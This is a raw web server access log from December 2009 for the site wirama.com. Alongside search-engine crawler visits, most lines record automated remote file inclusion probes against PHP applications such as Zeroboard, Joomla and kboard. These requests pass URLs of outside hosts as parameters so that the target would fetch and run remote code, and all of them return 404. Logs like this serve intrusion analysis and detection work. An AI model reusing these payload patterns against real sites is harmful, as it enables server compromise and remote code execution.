189.126.99.142 - - [01/Dec/2009:02:56:29 -0800] "GET /logs/access.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:35 -0800] "GET /logs/access_090701.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:47 -0800] "GET /logs/access_090701.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:02:56:50 -0800] "GET /logs/access_090701.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.131 - - [01/Dec/2009:02:56:54 -0800] "GET /?N=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:57:14 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.126.99.142 - - [01/Dec/2009:02:57:16 -0800] "GET /logs/access_090701.log//include/write.php?dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:57:16 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.132 - - [01/Dec/2009:02:57:27 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
201.24.6.150 - - [01/Dec/2009:02:59:14 -0800] "GET /logs/access_090501.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:02:59:37 -0800] "GET /logs/access_090501.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:03:04:12 -0800] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
201.24.6.150 - - [01/Dec/2009:03:04:16 -0800] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
213.171.225.234 - - [01/Dec/2009:03:07:00 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:07:00 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:07:00 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:08:11 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:08:11 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:08:11 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:13:32 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:13:32 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:13:32 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:14:04 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:14:04 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
213.171.225.234 - - [01/Dec/2009:03:14:04 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.98 - - [01/Dec/2009:03:17:37 -0800] "GET /_private/?S=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
157.100.230.82 - - [01/Dec/2009:03:25:53 -0800] "GET /logs/access_090501.log//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:03:25:53 -0800] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:03:25:56 -0800] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:03:25:56 -0800] "GET /logs/access_090329.log//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.162.235.85 - - [01/Dec/2009:03:26:02 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:26:03 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:26:06 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:26:41 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
95.108.150.235 - - [01/Dec/2009:03:29:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Dec/2009:03:29:35 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
95.108.150.235 - - [01/Dec/2009:03:29:36 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Dec/2009:03:29:37 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Dec/2009:03:29:38 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
95.108.150.235 - - [01/Dec/2009:03:29:41 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.221.130.18 - - [01/Dec/2009:03:30:38 -0800] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:35:05 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:35:09 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:35:12 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/_private/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:35:15 -0800] "GET /logs/ HTTP/1.1" 200 3512 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
125.162.235.85 - - [01/Dec/2009:03:35:19 -0800] "GET /logs/access.log HTTP/1.1" 200 134186 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "www.wirama.com"
77.221.130.18 - - [01/Dec/2009:03:36:38 -0800] "GET /logs/access_090330.log//skin/zero_vote/error.php?dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
157.100.230.82 - - [01/Dec/2009:03:37:40 -0800] "GET /logs/access_090501.log//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
157.100.230.82 - - [01/Dec/2009:03:37:40 -0800] "GET /libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
157.100.230.82 - - [01/Dec/2009:03:37:44 -0800] "GET /logs//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
157.100.230.82 - - [01/Dec/2009:03:38:23 -0800] "GET /logs/access_090329.log//libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
220.181.94.219 - - [01/Dec/2009:03:43:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.wirama.com"
220.181.94.219 - - [01/Dec/2009:03:43:28 -0800] "GET / HTTP/1.1" 200 916 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.wirama.com"
67.195.112.187 - - [01/Dec/2009:03:50:25 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:17 -0800] "GET /logs/access_090701.log/skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:17 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:17 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:25 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:25 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:25 -0800] "GET /logs/access_090701.log/skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:29 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:29 -0800] "GET /logs/access_090701.log/skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:03:29 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.87.192.182 - - [01/Dec/2009:04:17:38 -0800] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.87.192.182 - - [01/Dec/2009:04:17:38 -0800] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.87.192.182 - - [01/Dec/2009:04:17:38 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
124.3.124.199 - - [01/Dec/2009:04:18:38 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
124.3.124.199 - - [01/Dec/2009:04:18:39 -0800] "GET /logs/access_090330.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
124.3.124.199 - - [01/Dec/2009:04:18:39 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
65.55.207.93 - - [01/Dec/2009:04:19:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
124.3.124.199 - - [01/Dec/2009:04:19:14 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
124.3.124.199 - - [01/Dec/2009:04:19:14 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
124.3.124.199 - - [01/Dec/2009:04:19:15 -0800] "GET /logs/access_090330.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
124.3.124.199 - - [01/Dec/2009:04:21:50 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
124.3.124.199 - - [01/Dec/2009:04:22:41 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.prestigemarketinggroup.net/mambots/tukulid.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:23:25 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:23:25 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:23:25 -0800] "GET /logs/scripts.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:25:34 -0800] "GET /logs/scripts.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:25:34 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:25:35 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:25:39 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:25:39 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:25:39 -0800] "GET /logs/scripts.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:26:00 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:26:00 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:26:00 -0800] "GET /logs/access_090501.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:26:00 -0800] "GET /logs/access_090329.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:00 -0800] "GET /logs/access_090501.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:21 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:27 -0800] "GET /logs/access_090401.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:27 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:27 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:31 -0800] "GET /logs/access_090601.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:46 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:46 -0800] "GET /logs/access_090501.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:46 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:27:47 -0800] "GET /logs/access_090329.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:09 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:09 -0800] "GET /include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:09 -0800] "GET /logs//include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:20 -0800] "GET /logs//include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:20 -0800] "GET /include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:20 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:28:38 -0800] "GET /logs/access_090501.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:51 -0800] "GET /logs//include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:04:28:51 -0800] "GET /logs/access.log//include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
